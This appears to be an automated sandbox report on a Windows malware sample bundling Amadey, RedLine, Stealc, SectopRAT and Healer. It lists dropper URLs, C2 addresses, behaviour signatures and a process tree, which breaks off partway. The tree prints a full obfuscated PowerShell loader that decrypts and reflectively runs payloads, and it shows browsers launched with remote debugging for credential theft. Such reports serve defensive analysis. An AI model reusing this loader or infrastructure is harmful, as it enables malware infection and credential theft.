Overview

overview

10

Static

static

3

dfb3dd7483...8d.exe

windows7-x64

10

dfb3dd7483...8d.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2025 17:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dfb3dd74837e1f931c4456bd18eb5a8d.exe

  • Size

    2.0MB

  • MD5

    dfb3dd74837e1f931c4456bd18eb5a8d

  • SHA1

    51dd5849ef9ca1779d755ba5596691ea9a539bab

  • SHA256

    e7824fff5b683ad4df57bdc846e3763a507b76c3bfb369325f6ee117f6bf23f0

  • SHA512

    23e32188f617c067bec46d00c4be97af76253a2962be1defb7c17d074d0fb4c98865f2fcf8f78ece729d30996f64fe3414610c2d5dcc5dcc1f48f4ce765dd550

  • SSDEEP

    49152:mT6dCGskIPZMTwxw1j5Qb2MBPeIKQIcF3E1Wu4T1u:u6dCWVwxkj2bF19XlV1

Score
10/10
amadeyhealerredlinesectopratstealc9c9aa5cheatdefaultbootkitcredential_accessdefense_evasiondiscoverydropperevasionexecutioninfostealerpersistencepyinstallerratspywarestealertrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 25 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 39 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 13 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dfb3dd74837e1f931c4456bd18eb5a8d.exe
    "C:\Users\Admin\AppData\Local\Temp\dfb3dd74837e1f931c4456bd18eb5a8d.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3584
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3352
      • C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe
        "C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe
          "C:\Users\Admin\AppData\Local\Temp\1014060001\8bb20e8213.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1516
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 956
          4⤵
          • Program crash
          PID:3672
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4704
      • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
        "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1440
      • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
        "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4772
        • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
          "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4272
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 968
          4⤵
          • Program crash
          PID:976
      • C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
        "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4028
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4156
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            5⤵
            • Blocklisted process makes network request
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1116
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3492
      • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
        "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3216
      • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3348
      • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
        "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4448
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4736
      • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
        "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4016
      • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
        "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2624
      • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
        "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2988
      • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:4908
        • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:688
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 968
          4⤵
          • Program crash
          PID:3224
      • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
        "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2272
      • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
        "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:4664
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1512
          4⤵
          • Program crash
          PID:2988
      • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
        "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:1056
        • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
          "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:392
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 956
          4⤵
          • Program crash
          PID:2916
      • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2728
        • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:5076
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2052
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe8c5ccc40,0x7ffe8c5ccc4c,0x7ffe8c5ccc58
              6⤵
                PID:4668
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1892 /prefetch:2
                6⤵
                  PID:2756
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1996,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2156 /prefetch:3
                  6⤵
                    PID:3364
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8
                    6⤵
                      PID:1996
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:336
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:2248
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4112 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4720
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:8
                      6⤵
                        PID:1548
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:8
                        6⤵
                          PID:2988
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4824 /prefetch:8
                          6⤵
                            PID:1640
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,7983371697124920171,15608369451078857097,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
                            6⤵
                              PID:4080
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            5⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:6012
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe8c5d46f8,0x7ffe8c5d4708,0x7ffe8c5d4718
                              6⤵
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:6032
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
                              6⤵
                                PID:3456
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
                                6⤵
                                  PID:3608
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
                                  6⤵
                                    PID:5196
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,4757535964540938521,1002424124440903684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:1672
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
